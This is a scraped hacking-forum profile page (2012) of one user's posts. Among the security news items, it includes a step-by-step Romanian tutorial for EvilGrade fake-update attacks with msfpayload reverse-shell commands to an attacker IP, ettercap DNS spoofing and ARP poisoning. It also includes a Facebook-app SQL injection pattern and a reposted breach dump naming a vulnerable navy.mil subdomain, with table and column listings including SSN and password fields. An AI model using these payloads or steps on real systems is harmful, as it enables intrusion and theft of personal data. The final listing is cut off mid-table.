Wubi's Content - Page 23 - Romanian Security Team

Carduri bancare lansate de " FaceBook

Wubi replied to bc-vnt's topic in Stiri securitate

[...]in aplicatiile facebook[...] http://apps.facebook.com/[Aplicatia]/index.php/facebook/[SQLi] Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/[PATH]/public_html/facebook/apps/quotes/index.php on line 92 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/[PATH]/public_html/facebook/apps/quotes/index.php on line 103 Pare cam prea usor.

June 25, 2012
6 replies

zAnti Pentester’s Worldcup tournament open for Hackers

Wubi posted a topic in Stiri securitate

zAnti Pentester’s Worldcup tournament open for Hackers Today is a great day to be a security enthusiastic since Zimperium kicked off the first ever penetration testing tournament. — Welcome to the Pentester’s Worldcup! Zimperium, a mobile security software start-up was founded by Itzhak “Zuk” Avraham, a world-renowned white-hat hacker, in 2011. The Pentester’s World Cup is part of Zimperium’s efforts to increase awareness about mobile security, and simultaneously enhance the security of its range of award-winning products. You may recall Anti, The first comprehensive Penetration Testing software offered on Smartphones, Zimperium created a killer mobile app that is so simple to use, any technical person is able to perform pentest on his network to get status of which devices that are attached to the network are vulnerable, what ports are opened and additional information that is a must have for anyone who cares about the safety on his network. Last year at DEFCON, Avraham, also known as @ihackbanme, introduced the ethical-hacking tool, "Android Network Toolkit," dubbed Anti for short. At that time, it was in Beta, but now the new app is being released as Zimperium's ANTI, or zAnti for short. "We live in a dangerous mobile world today, and our goal is to significantly raise awareness about security and take steps toward securing our mobile future,” said Avraham. “The World Cup also presents an opportunity for the world’s best hackers to challenge our products and make them better. We know of several companies that changed their network configuration because of ANTI, This allows us, the users to be safer. We're thrilled to know that ANTI raised security awareness!" Avraham explained, “World Cup Competitors will use our zAnti penetration testing software for smartphones and perform a variety of tasks such as scanning networks, finding vulnerabilities and security holes in the networks, or even cheating. The entrants will be scored on their performances and also rewarded for finding bugs.”, ANTI was originally developed to provide one-click tool to perform penetration testing tasks with a reasonable price. Most features of ANTI are free, The winner will be awarded the “Black Card,” an entrance ticket worth $2,000 for the Black Hat event during July 25-26 and hotel accommodations in Las Vegas. The top 10 players will receive free Platinum, Gold or Silver accounts in zAnti. Top 10 researchers will receive T-shirts and wristbands to enter Zimperium’s closed event at the Las Vegas Black Hat event. Researchers who find a bug and report it to Zimperium will receive 500 points and a cool zAnti t-Shirt.- The reported glitch will affect the score of every participant who used it - a hacker's duel! The World Cup ends July 16. zAnti can be downloaded directly here. Keep an eye on the Pentester's World Cup Leaderboard. May the best hacker win! About Zimperum Zimperium Ltd. is a privately owned mobile security software start-up located in Tel Aviv, Israel. The company was founded in 2011 by Itzhak “Zuk” Avraham, a highly regarded security researcher. Zimperium has set for itself a simple goal: Ensure world-class mobile security for enterprises, governments and mobile carriers. Starting out with a team of nine Ninjas using their collective Zen, Zimperium has created multiple products that secure our mobile environment against targeted hacking attempts (APT) or widespread threats (Worms) with very neat 0day protection features. Sursa

June 25, 2012
- pentester world cup

A virus specialized for AutoCAD, a perfect cyber espionage tool

Wubi posted a topic in Stiri securitate

A virus specialized for AutoCAD, a perfect cyber espionage tool In recent years we are assisting to a profoundly change in the nature of malware, it is increased the development for spy purposes, for its spread in both private and government sectors. The recent case of Flame malware has demonstrated the efficiency of a malicious agent as a gathering tool in a typical context of state-sponsored attack for cyber espionage. Event like this represent the tip of the iceberg, every day millions of malware instances infect pc in every place in the world causing serious damages related to the leak of sensible information. Specific viruses are developed to address particular sectors and information, that is the case for example of “ACAD/Medre.A”, a malware specialized in the theft of AutoCAD files. The virus has been developed to steal blueprints from private companies mostly based in Peru according the expert of the security firm ESET. The virus is able to locate AutoCAD file on infected machines and to send them via e-mail to accounts provided by two Chinese internet firms, 163.com and qq.com. The malware detected is written in AutoLISP, an AutoCAD scripting language, ACAD/Medre for the shipment of stolen data creates a password protected RAR-file containing the blueprints and the requisite “acad.fas” file and a “.dxf” file and send it separately by e-mail. The .DXF file generated by ACAD/Medre contains a set of information that the recipient uses to the collecting of stolen files. The password used for the RAR file is just one character equals to “1”. Once discovered the email accounts used to transfer the stolen data the group of researcher noticed that the InBox for each of them was full, they turned out all saturated by over 100,000 mails giving an idea of the dimension of the attack. The virus has been detected several months ago but only in the last weeks it has been observed an explosion of the number of infected systems. The researcher Righard Zwienenberg researcher of ESET declared “It represents a serious case of industrial espionage,” “Every new design is sent automatically to the operator of this malware. Needless to say this can cost the legitimate owner of the intellectual property a lot of money as the cybercriminals have access to the designs even before they go into production.” “They may even have the guts to apply for patents on the product before the inventor has registered it at the patent office.” The malware not limits its action to steal Autocad projects, it also checks the presence of Outlook email client to steal the pst file containing contacts, calendar and emails, confirming its genesis of espionage tool. For completeness of information ESET provided a free stand-alone cleaner available for the ACAD/Medre.A worm. Every time we speak about of cyber espionage we could not think other that China, however the practice is really diffused and the fact that the accounts are related to Chinese accounts is clue but not a certainty. It’s clear that Chinese hackers are considered worldwide specialist in cyber espionage, the case of Nortel is considered a case study for the impact of cyber espionage on the business of private companies. The Chinese government, and not only, at least a decade sponsored espionage activities for stealing trade secrets, confidential information and intellectual property of various kinds. Many experts are convinced that thanks to their ability to spy they were able, through the theft and reverse engineering of products, to clear the technological gap with the western industry. This time the Chinese authorities have demonstrated a collaborative approach identifying and blocking the accounts used for theft. Tens of thousands of AutoCAD blueprints leaked, the team of ESET experts promptly contacted the Chinese authorities such us Tencent company, owners of the qq.com domain, and also the Chinese National Computer Virus Emergency Response Center, their collaboration was essential to access to the account blocking them. Another lesson learnt is an efficient fight to the cybercrime must be conducted with a total collaboration of all the involved actors. Only in this way it’s possible to conduct an efficient immunization . Written By: Pierluigi Paganini References [source]

June 23, 2012

Hacking AutoUpdate injectand actualizari false

Wubi posted a topic in Tutoriale in romana

Functioneaza pe Java, AppleUpdate, Google Analytics, Skype, Blackberry si multe altele... Introducere Cu totii stim ca hackerii incearca in mod constant informatii private intrand in sistemul victimei, sau de asemenea, exploatand software-urile instalate in sistem sau alte cai. Conform unui raport, mai mult de 60 % dintre userii Adobe Reader folosesc versiuni neactualizate, acestea fiind vulnerabile atacurilor. Utilizand actualizari de rutina pentru software, utilizatorii se pot proteja, actualizand patch-uri de rutina ce protejeaza impotriva vulnerabilitatilor deja cunoscute, reducand sansele de a fi "pradati" de catre hackeri. Cele mai folosite software-uri, cum ar fi MS Office, Adobe Flash si PDF reader(la fel de bine ca si browserele), sunt tintele majore ale exploatarilor daca sunt lasate neactualizate. In trecut false actualizari pentru Firefox, IE, etc. au facut sa apara mesaje care informau utilizatorii ca versiunea actualizata pentru un plugin sau browser era valabila, facand ca userul sa isi actualizeze software-urile. Spre exemplu, pagina ii va spune utilizatorului ca actualizarea versiunii flash este urgenta. Odata ce utilizatorul instaleaza falsul update, va descarca un continut malitios(de ex, Zeus Trojan) in calculatorul victimei. Atacuri similare au fost facute in trecut pe diverse browsere. In mod normal, daca este un update pentru Firefox, notificarile apar ca pop-ups nu ca pagini web. Un mod mai bun de a verifica daca este o actualizare noua in Firefox este sa mergeti la Help option, Selectezi "About Firefox", iar daca browserul are nevoie de actualizare, sigur va aparea ceva ca "apply update". Daca nu esti sigur de aplicatiile tale, 1. Verifica site-ul oficial sau site-ul aplicatiei 2. Pentru a verifica update-urile disponibile, mergi la adresa Firefox Web Browser — Plugin Check & Updates . URL-ul iti va scana browser-ul Firefox pentru actualizari ale pluginurilor instalate si va oferi informatii despre spunand daca pluginul este vulnerabil sau are nevoie de o actualizare. Majoritatea oamenilor evita actualizarile ce pot deveni enervante uneori. Dar daca detinem informatii sensibile, in sistemul propriu, atunci actualizarile sunt importante si ar trebui sa fie prioritatea numarul unu. Daca te gandesti, cati oameni sunt intr`adevar atenti in legatura cu actualizarile, tipul de actualizare, sau link-ul de unde o descarca si instaleaza?! Evident, sunt foarte putini oameni care sunt intr`adevar atenti si vigilenti in legatura cu actualizarile. O cale efectiva de a exploata utilizatorul este sa utilizezi tool-uri ca EvilGrade. Inainte de a trece pe EvilGrade, sa aruncam o privire la un bash script, ce poate in mod automat sa faca Manning in Middle si sa exploateze userul oferindui o falsa actualizare. Asta se face setand un DHCP si un server web. Odata ce a fost realizat creaza un exploit folosind msf si asteapta ca victima sa se conecteze la falsa actualizare apoi ruleaza exploit-ul. Odata ce falsul update este executat, calculatorul victimei este exploatat si creaza acces la sistemul victimei. Putem extrage acest bash script folosind tar zxf metasploit-fakeUpdate[v0.1.4].tar.gz si copiind folderul 'www' in /var/www (cp www/* /var/www/). Urmeaza editarea metasploit-fakeupdate.sh cu interfata internet-ului. Si vom rula metasploit-fakeupdate.sh. Odata ce acesti pasi sunt urmati, asteapta ca tinta, sa se conecteze. Comenzile sunt urmatoarele tar zxf metasploit-fakeUpdate\[v0.1.4\].tar.gz cd metasploit-fakeUpdate\[v0.1.4\] cp www/* /var/www ifconfig kate metasploit-fakeUpdate.sh bash metasploit-fakeUpdate.sh Despre EvilGrade: EvilGrade e un framework ce exploateaza slabiciunile serviciilor de actualizari automate ale multor pachete de software-uri comune si atacul acestui framework este unul dintre cele mai bune exemple pentru exploatarea clientului. Acest framework insala sistemul sa creada ca acolo este semnalata o actualizare valabila pentru produs, facand utilizatorul sa instaleze actualizarea, acesta fiind beneficiul atacatorului. Acest tip de atac este un pic dificil de detectat de un utilizator normal, deoarece acesta nu vede nimic suspicios si actualizarea pare in regula. Putem folosi acest framework in combinatie cu DNS spoofing sau Man-in-the-middle attack pentru a crea o actualizare software-urilor. Acest lucru pacaleste victima sa descarce actualizarea, in acest fel fiind executat codul nostru malitios. EvilGrade suporta multe sowftware-uri cunoscute, cum ar fi Notepad, iTunes, Java plug-in, WinZip, Winamp, DAP, OpenOffices, Linkedln, Speedbit, etc. EvilGrade ia avantajele multor aplicatii, deoarece majoritatea acestora nu verifica nici continutul actualizarii, nici serverul principal de actualizari. De fapt, acest tip de atac face ca atacatorul sa modifice traficul DNS al victimei si sa il transforme in alte adrese ip controlate de acesta. Scenariul general al procesului de actualizare: O aplicatie incepe procesul de actualizare si incearca sa ceara de la acesta hostul dns server (cum ar fi, de exemplu, update.notepadplus.com). Serverul DNS raspunde, de asemenea, cu ceva informatii. Acum aplicatia ia fisierul lastupdate.xml de la update.app1.com si analizeaza fisierul actualizat. Daca detecteaza o noua actualizare, atunci o va instala. Figura simpla a procesului general de actualizare Poti descarca ISR-evilgrade de pe http://www.infobytesec.com/down/isr-evilgrade-2.0.0.tar.gz Pasi pentru a instala EvilGrade: Pasul 1: Descarca si extrage EvilGrade http://www.infobytesec.com/down/isr-evilgrade-2.0.0.tar.gz . Pentru extragere, comanda este: http://www.infobytesec.com/down/isr-evilgrade-2.0.0.tar.gz Pasul 2: Descarca modulul Perl cerut daca e necesar si ruleaza evilgrade utilizand comanda $. /evilgrade Nota: Cateodata, in timpul rularii EvilGrade, putem avea cateva probleme, cum ar fi cele de mai jos, spre exemplu: Nu poate fi localizat: Data/Dump.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.1 /usr/local/share/perl/5.10.1 /usr/lib/perl5 usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at isrcore/Shell.pm line 28. Pentru a rezolva asta, rulam comanda in terminal cpan Data::Dump Inainte de a ataca tinta, vom putea fi nevoiti sa investigam aplicatia tinta. Vom fi nevoiti sa creem o actualizare falsa folosind EvilGrade pentru a o injecta in calculatorul victimei. Pentru a insira toate aplicatiie suportate, utilizeaza comanda show modules in consola; mai jos sunt modulele enumerate: In urmatorul exemplu voi crea o actualizare malitioase in notepad ++. Pentru a configura modulul specificat, o comanda simlpa ar putea fi evilgrade>configure notepadplus Pentru a vizualiza optiunile pentru modulul selectat, utilizeaza comanda "show options". Nota: In imagine, adresa "Virtual Host" este importanta - aceasta va fi folosita mai tarziu pentru atac. Urmatorul pas ar fi setarea agentului. Agentul nu este nimic mai mult decat o actualizare binara falsa. Va trebui sa setam "drumul" spre unde aceasta este localizata; putem, de asemenea, sa implementam o actualizare dinamica binara falsa, unde vom putea genera orice plata a Metaspoilt. Putem configura agentul cu orice tip de plata utilizand msfpayload ca, spre exemplu, shell_reverse_tcp. Putem creea payload-ul si sa il utilizam cu EvilGrade sau putem creea un payload in afara framework-ului. Metoda 1: Pentru a creea un payload in EvilGrade, comanda pe care o vom folosi este evilgrade (notepadplus)>set agent ‘["/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=192.168.75.130 LPORT=1234 X > <%OUT%>/tmp/notepadplus.exe<%OUT%>"]‘ Aici, setam actualizarea falsa in payload-ul “windows/shell_reverse_tcp” utilizand un shell pentru a ne conecta la adresa 192.168.75.130 (adresa ip a atacatorului) port 1234. Eticheta <%OUT%><%OUT> este una speciala pentru a detecta unde va fi generat output-ul. Metoda 2: Creeaza un payload in afara EvilGrade, utilizand msfpayload. [root@bt]$ msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.75.130 LPORT=1234 X > /tmp/reverse-shell.exe Acum putem numi acest payload in EvilGrade utilizand urmatoarea comanda. evilgrade(notepadplus)>set agent /tmp/reverse-shell.exe Odata ce avem totul gata, trebuie sa deschidem serverul EvilGrade. Acest lucru se face simplu selectand comanda START. Acum ca avem serverul deschis, urmatorul pas ar fi sa configuram atacul Man in the Middle utilizand Ettercap. Cum am spus, EvilGrade, impreuna cu combinatia DNS spoofing sau atacul Man in the Middle, poate fi folosit pentru a pacali victima. Sa configuram etter.dns. pico /usr/share/ettercap/etter.dns Aici trebuie sa schimbam adresa VirtualHost inlocuind-o cu adresa noastra ip i.e. , notepad-plus.sourceforge.net = adresa ip a atacatorului. Odata ce e confgurata, deschidem Ettercap, de vreme ce e o unealta care merge bine pe aracuri MITM in LAN. Pentru a deschide Ettercap, scrie comanda in terminal - ettercap -G Apasa Sniff -> Unified sniffing -> chose your network interface card. Aici e eth0 Odata ce network interface card e selectat, activeaza plugin-ul dns_spoof dand dublu click pe el. Acest plugin poate fi folosit pentru a redirectiona cererea victimei catre serverul EvilGrade. Apasa Plugins -> Manage the plugins -> Dublu click dns_spoof. Acum sa scanam hosturile in reteaua noastra. Apasa Hosts -> Scan for hosts. Odata ce scanarea pentru hosturi este facuta, selecteaza host list pentru a vizualiza hosturile gasite in retea. Rezultatul ar trebui sa fie similar acestuia De asemenea, trebuie sa facem un atac MIMT pentru a intercepta toate datele pe retea. Click Mitm -> Arp poisoning -> check "Sniff remote connection". Inainte de a incepe, mai este un lucru important pe care ar trebui sa-l facem, acesta fiind setarea tintei. Adauga adresa router-ului catre tinta 1 facand click pe "Add to target 1" si adresa ip a victimei catre tinta 2 facand click pe "Add to target 2". Odata ce asta e gata, utilizeaza Netcat pentru a vizualiza portul in EvilGrade. In acest caz este 1234. Acum, asteapta ca victima sa deschida notepad plus. Odata deschis, acesteia ii va aparea un pop-up care va cere o actualizare. Daca victima continua cu actualizarile, vei primi shell-ul lor de unde il vom putea exploata. Concluzie: EvilGrade este o unealta foarte puternica pentru "spargerea" unui sistem. Cu ajutorul uneltelor ca ettercap, letalitatea acestuia este marita. Framework-ul este o platforma independenta, adica , unealta poate "sparge" orice sistem. O protectie impotriva acestuia poate fi sa nu actualizati nici un program daca actualizarile vin de la o retea neindentificata. Cea mai buna parte a acestei unelte este ca atacul nu este doar prentru sistemele Windows, ci pentru orice mecanism vulnerabil. Singurul lucru pe care atacatorul il are de facut este sa hackeze procesul de actualizare de pe computerul tinta printr-o retea. Dupa asta, game over. EN: InfoSec Resources – Hacking AutoUpdate by Injecting Fake Updates

June 23, 2012
1 reply
- autoupdate hacking

Au sosit intaririle !

Wubi replied to kempactick's topic in Bine ai venit

Suna ca si cum ai venit aici din lipsa faptulului ca nu mai ai pe ce sa te joci CS. Bun venit oricum.

June 23, 2012
13 replies

navy.mil; dhs.gov; ua.edu; database leaked by digital-coruption

Wubi posted a topic in Programe utile

Credits: .########..####..######...####.########....###....##........######...#######..########..########..##.....##.########..########.####..#######..##....## .##.....##..##..##....##...##.....##......##.##...##.......##....##.##.....##.##.....##.##.....##.##.....##.##.....##....##.....##..##.....##.###...## .##.....##..##..##.........##.....##.....##...##..##.......##.......##.....##.##.....##.##.....##.##.....##.##.....##....##.....##..##.....##.####..## .##.....##..##..##...####..##.....##....##.....##.##.......##.......##.....##.########..########..##.....##.########.....##.....##..##.....##.##.##.## .##.....##..##..##....##...##.....##....#########.##.......##.......##.....##.##...##...##...##...##.....##.##...........##.....##..##.....##.##..#### .##.....##..##..##....##...##.....##....##.....##.##.......##....##.##.....##.##....##..##....##..##.....##.##...........##.....##..##.....##.##...### .########..####..######...####....##....##.....##.########..######...#######..##.....##.##.....##..#######..##...........##....####..#######..##....## [ / s3lf-d3struct / Bw0mp / s0lar / 3piC/ Vapor /]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= #[x] RM'D YOUR SERVERS, UMAD? ############################################ say("#FreeTriCk #FreeMLT #FreePhantom"); say("Knowledge is power!"); say("NAVY.MIL, care to share some of your staff information?"); ############################################ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= OUR SITE: Digital-corruption.org OUR TWITTERS: @digitalcorrupt @s3lf_d3struct @bw0mp @_s0lar_ And we want to give a special thanks to vapor @vap0rizer Navy.mil: #################################################################################### #==================================================================================# #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~# #==================================================================================# # _____ _ _ __ _____ _ _ # # |_ _| | | | | / _| / __ \ | | | | # # | | __ _| |__ | | ___ ___ | |_ | / \/ ___ _ __ | |_ ___ _ __ | |_ ___ # # | |/ _` | '_ \| |/ _ \ / _ \| _| | | / _ \| '_ \| __/ _ \ '_ \| __/ __| # # | | (_| | |_) | | __/ | (_) | | | \__/\ (_) | | | | || __/ | | | |_\__ \ # # \_/\__,_|_.__/|_|\___| \___/|_| \____/\___/|_| |_|\__\___|_| |_|\__|___/ # # # #==================================================================================# #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~# #==================================================================================# # 1.0 - NAVY.MIL - 1.0 # # 2.0 - DHS.GOV - 2.0 # # 3.0 - UA.EDU - 3.0 # # # #==================================================================================# #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~# #==================================================================================# #################################################################################### _ _ ___ ____ ____ __ ___ _ | \ | | / \ \ / /\ \ / / \/ |_ _| | | \| | / _ \ \ / / \ V /| |\/| || || | GETTING OWNED? YES SIR! | |\ |/ ___ \ V / | |_| | | || || |___ |_| \_/_/ \_\_/ |_(_)_| |_|___|_____| ~$ Target: Navy.mil ~$ Vulnerable subdomain: https://www.smartwebmove.navsup.navy.mil/ ~$ Exploitable method: Blind Oracle SQLi # # ( ) ___#_#___|__ _ |____________| _ _=====| | | | | |==== _ =====| |.---------------------------. | |==== <--------------------' . . . . . . . . '--------------/ \ I H4XX3D MY OWN BOAT? <333 / \__FIRE THE DATABASE <333___________________________________/ wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww ====DATABASES==== Available databases [3]: [*] HHG_MGR [*] SYS [*] SYSTEM ====TABLES==== Database: HHG_MGR [104 tables] +--------------------------------+ | ACCOUNT | | ACCOUNT_ARCH | | ACCOUNT_TEMP | | APPLICATION_STATUS | | APPLICATION_STATUS_ARCH | | APPLICATION_STATUS_TEMP | | APPLICATION_STEPS | | CONTACT_INFO | | CONTACT_INFO_ARCH | | DD1299 | | DD1299_ARCH | | DEPARTURE_INFO | | DOM_PPSO_CONTACT_INSTR | | ELIGIBILITY | | ELIGIBILITY_ARCH | | FIREARMS | | FIREARMS_ARCH | | HHG_QRESPONSES | | HHG_QRESPONSES_ARCH | | HOLIDAY_DATES | | INSURANCE_ELECTIONS | | INSURANCE_ELECTIONS_ARCH | | MEMBER_CONTACT | | MEMBER_CONTACT_ARCH | | MEMBER_ORDERS | | MEMBER_ORDERS_ARCH | | MOBILE_HOMES | | MOBILE_HOMES_ARCH | | MOTORCYCLES | | MOTORCYCLES_ARCH | | MOVE_INFO | | MOVE_INFO_ARCH | | NEW_DUTY_STATION_INFO | | NEW_DUTY_STATION_INFO_ARCH | | NTS_EXTENSION_SHIPMENT | | NTS_EXTENSION_SHIPMENT_ARCH | | NTS_RELEASE_SHIPMENT | | NTS_RELEASE_SHIPMENT_ARCH | | NTS_SHIPMENT | | NTS_SHIPMENT_ARCH | | ORDERS_MASTER | | ORDERS_MASTER_ARCH | | PERSONNEL | | POINT_OF_CONTACT | | POINT_OF_CONTACT_ARCH | | POV | | POV_ARCH | | PPCIG_CONSUMABLES | | PPCIG_CONSUMABLES_SPECIFICS | | PPCIG_COUNTRY_CODE | | PPCIG_COUNTRY_INFO | | PPCIG_COUNTRY_INFO_WEIGHTS | | PPCIG_COUNTRY_WEIGHTS | | PPCIG_CUSTOMS_CLEARANCE | | PPCIG_CUSTOMS_CLEARANCE_SPEC | | PPCIG_ELECTRICAL_EQUIPMENT | | PPCIG_ELECTRIC_EQUIPMENT_SPEC | | PPCIG_FIREARMS | | PPCIG_FIREARMS_SPECIFICS | | PPCIG_FURNITURE | | PPCIG_FURNITURE_SITE_SPECIFICS | | PPCIG_FURNITURE_SPECIFICS | | PPCIG_OTHER | | PPCIG_OTHER_SITE_SPECIFICS | | PPCIG_OTHER_SPECIFICS | | PPCIG_PETS | | PPCIG_PETS_SPECIFICS | | PPCIG_PORN | | PPCIG_PORN_SPECIFICS | | PPCIG_POV | | PPCIG_POV_SPECIFICS | | PPCIG_SEPARATION | | PPCIG_SEPARATION_SITE_SPEC | | PPCIG_SERVICE_CODE | | PPCIG_SHIP_INSTRUCTIONS | | PPCIG_SHIP_INSTRUCTIONS_SPEC | | PPCIG_STUFFED_WILDLIFE | | PPCIG_STUFF_WILDLIFE_SITE_SPEC | | PPCIG_SUBCHAPTER | | PPCIG_TRANSMIT_EQUIPMENT | | PPCIG_TRANSMIT_EQUIP_SITE_SPEC | | PPM_INFO | | PPM_INFO_ARCH | | PROCESSING_CENTERS | | RELEASE_ITEMS | | RELEASE_ITEMS_ARCH | | SHIPMENT | | SHIPMENT_ARCH | | SHIPMENT_SUPPLEMENT | | SHIPMENT_SUPPLEMENT_ARCH | | SHIP_ADDL_ADDRESSES | | SHIP_ADDL_ADDRESSES_ARCH | | SHIP_ADDRESSES | | SHIP_ADDRESSES_ARCH | | SHIP_WEIGHTS | | SHIP_WEIGHTS_ARCH | | SURVEY | | SWM_QUEUE | | SWM_QUEUE_ARCH | | TOAD_PLAN_TABLE | | UNUSUAL_OVERSIZE_ITEMS | | UNUSUAL_OVERSIZE_ITEMS_ARCH | | WEIGHT_ENTITLEMENT | | ZIP_TO_GBLOC | +--------------------------------+ Database: SYS [24 tables] +-------------------------------+ | HS_PARALLEL_METADATA | | KUNOEXP_TAB | | KU_DATAPUMP_MASTER_10_1 | | KU_DATAPUMP_MASTER_11_1 | | KU_DATAPUMP_MASTER_11_1_0_7 | | KU_DATAPUMP_MASTER_11_2 | | KU_LIST_FILTER_TEMP | | KU_LIST_FILTER_TEMP_2 | | ODCI_PMO_ROWIDS | | ODCI_SECOBJ | | ODCI_WARNINGS | | PLAN_TABLE | | WRI_ADV_ASA_RECO_DATA | | WRR_REPLAY_CALL_FILTER | | AUDIT_ACTIONS | | DUAL | | HS_BULKLOAD_VIEW_OBJ | | HS_PARTITION_COL_NAME | | HS_PARTITION_COL_TYPE | | IMPDP_STATS | | PSTUBTBL | | STMT_AUDIT_OPTION_MAP | | SYSTEM_PRIVILEGE_MAP | | TABLE_PRIVILEGE_MAP | +-------------------------------+ Database: SYSTEM [4 tables] +-----------+ | OL | | OLHINTS | | OLNODES | | HELP | +-----------+ ====COLUMNS==== Database: HHG_MGR Table: ACCOUNT [18 columns] +------------------------+----------+ | Column | Type | +------------------------+----------+ | ACTIVE_FLAG | VARCHAR2 | | ADMIN_FLAG | VARCHAR2 | | ASSIGNED_COUNSELOR_ID | VARCHAR2 | | CONFIRMATION_STRING | VARCHAR2 | | COUNSELOR_NOTES | VARCHAR2 | | DISTINGUISHED_NAME | VARCHAR2 | | DUPLICATE | CHAR | | LAST_ACTIVE_DATE | DATE | | ORDERS_SERIAL_KEY | NUMBER | | PASSWORD_CREATED_DATE | DATE | | PASSWORD_HINT | VARCHAR2 | | PROC_PROCESSING_CENTER | VARCHAR2 | | SESSION_ID | VARCHAR2 | | SSN | VARCHAR2 | | SUBMIT_DATE | DATE | | TOPS_SUBMIT_DATE | DATE | | USER_PASSWORD | VARCHAR2 | | USERNAME | VARCHAR2 | +------------------------+----------+ Database: HHG_MGR Table: DD1299 [11 columns] +-------------------------------+----------+ | Column | Type | +-------------------------------+----------+ | DATE_DD1299_PRINTED | DATE | | DD1299_BLOCK13_REMARKS | VARCHAR2 | | DD1299_DATE_PREPARED | DATE | | DD1299_MAILED_IN | VARCHAR2 | | DD1299_PREPARING_INSTALLATION | VARCHAR2 | | DD1299_REASON_NO_SIGNATURE | VARCHAR2 | | DD1299MAIL_OUT | VARCHAR2 | | NAME_OF_CERTIFYING_OFFICER | VARCHAR2 | | ORDERS_SERIAL_KEY | NUMBER | | SHIPMENT_NUMBER | NUMBER | | TITLE_OF_CERTIFYING_OFFICER | VARCHAR2 | +-------------------------------+----------+ Database: HHG_MGR Table: DEPARTURE_INFO [15 columns] +-----------------+--------+ | Column | Type | +-----------------+--------+ | ABBR_POV | CLOB | | BOAT | CLOB | | CONSUMABLES | CLOB | | COUNTRY_INFO_ID | NUMBER | | CUSTOMS | CLOB | | FIREARM | CLOB | | FURNITURE | CLOB | | HOUSING | CLOB | | JETSKI | CLOB | | MISCELLANEOUS | CLOB | | MOTORCYCLE | CLOB | | PET | CLOB | | PLANT | CLOB | | PORN | CLOB | | POV | CLOB | +-----------------+--------+ Database: HHG_MGR Table: FIREARMS [7 columns] +-------------------+----------+ | Column | Type | +-------------------+----------+ | FARM_CALIBER | VARCHAR2 | | FARM_MAKE | VARCHAR2 | | FARM_MODEL | VARCHAR2 | | FARM_SERIAL_NBR | VARCHAR2 | | FARM_VALUE | NUMBER | | ORDERS_SERIAL_KEY | NUMBER | | SHIPMENT_NUMBER | NUMBER | +-------------------+----------+ Database: HHG_MGR Table: INSURANCE_ELECTIONS [3 columns] +-------------------+----------+ | Column | Type | +-------------------+----------+ | ORDERS_SERIAL_KEY | NUMBER | | SHIPMENT_NUMBER | NUMBER | | TYPE_OF_INSURANCE | VARCHAR2 | +-------------------+----------+ Database: HHG_MGR Table: MEMBER_CONTACT [36 columns] +--------------------------------+----------+ | Column | Type | +--------------------------------+----------+ | DESTINATION_SPONSOR_NAME | VARCHAR2 | | DESTINATION_SPONSOR_PHONE | VARCHAR2 | | DESTINATION_SPONSOR_PHONE_EXT | VARCHAR2 | | HHG_CONTACT_NAME | VARCHAR2 | | HHG_INTRANSIT_CONTACT_NAME | VARCHAR2 | | HHG_STORAGE_COMPANY_NAME | VARCHAR2 | | HHG_STORAGE_LOT_ID | VARCHAR2 | | HHG_STORAGE_PHONE | VARCHAR2 | | HHG_STORAGE_PHONE_EXT | VARCHAR2 | | MBR_DEST_CONT_PHONE_NUMBER_EXT | VARCHAR2 | | MBR_DEST_CONTACT_CITY | VARCHAR2 | | MBR_DEST_CONTACT_COUNTRY | VARCHAR2 | | MBR_DEST_CONTACT_PHONE_NUMBER | VARCHAR2 | | MBR_DEST_CONTACT_STATE | VARCHAR2 | | MBR_DEST_CONTACT_STREET | VARCHAR2 | | MBR_DEST_CONTACT_ZIP_APO_FPO | VARCHAR2 | | MBR_DEST_DUTY_PHONE_NUMBER | VARCHAR2 | | MBR_DEST_DUTY_PHONE_NUMBER_EXT | VARCHAR2 | | MBR_INTRANS_CONTACT_PHONE_EXT | VARCHAR2 | | MBR_INTRANSIT_CARE_OF_NAME | VARCHAR2 | | MBR_INTRANSIT_CONTACT_CITY | VARCHAR2 | | MBR_INTRANSIT_CONTACT_COUNTRY | VARCHAR2 | | MBR_INTRANSIT_CONTACT_PHONE | VARCHAR2 | | MBR_INTRANSIT_CONTACT_STATE | VARCHAR2 | | MBR_INTRANSIT_CONTACT_STREET | VARCHAR2 | | MBR_INTRANSIT_ZIP_APO_FPO | VARCHAR2 | | MBR_ORG_DUTY_PHONE_NUMBER_EXT | VARCHAR2 | | MBR_ORG_HOME_PHONE_NUMBER_EXT | VARCHAR2 | | MBR_ORIGIN_CONTACT_CITY | VARCHAR2 | | MBR_ORIGIN_CONTACT_COUNTRY | VARCHAR2 | | MBR_ORIGIN_CONTACT_STATE | VARCHAR2 | | MBR_ORIGIN_CONTACT_STREET | VARCHAR2 | | MBR_ORIGIN_CONTACT_ZIP_APO_FPO | VARCHAR2 | | MBR_ORIGIN_DUTY_PHONE_NUMBER | VARCHAR2 | | MBR_ORIGIN_HOME_PHONE_NUMBER | VARCHAR2 | | ORDERS_SERIAL_KEY | NUMBER | +--------------------------------+----------+ Database: HHG_MGR Table: 